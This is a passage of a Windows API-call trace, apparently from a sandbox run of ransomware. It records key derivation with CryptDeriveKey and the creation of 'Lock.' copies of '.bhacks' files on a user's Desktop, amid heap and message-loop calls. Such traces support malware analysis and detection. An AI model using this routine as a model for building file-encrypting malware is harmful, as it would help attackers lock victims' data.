lpMsg=0x8cf3b8) returned 0 [0090.146] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9df0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.147] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3cc0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3d00) returned 1 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.147] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.147] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.147] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.148] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.148] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.148] CryptDestroyHash (hHash=0x9a3cc0) returned 1 [0090.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\dqunilu.gif.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0090.149] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.149] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0090.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0090.149] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.150] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0090.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0090.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.DqUNIlu.gif.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.dqunilu.gif.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0090.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0090.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0090.151] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0090.152] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.152] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x39c1020 [0090.155] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0090.155] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x4b80, lpOverlapped=0x0) returned 1 [0090.156] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0090.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b80) returned 0x2a7a130 [0090.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39c1020 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b80) returned 0x2a7ecb8 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.160] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b80) returned 0x2a7a130 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.161] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0090.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b80) returned 0x2a7a130 [0090.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.162] RtlAllocateHeap 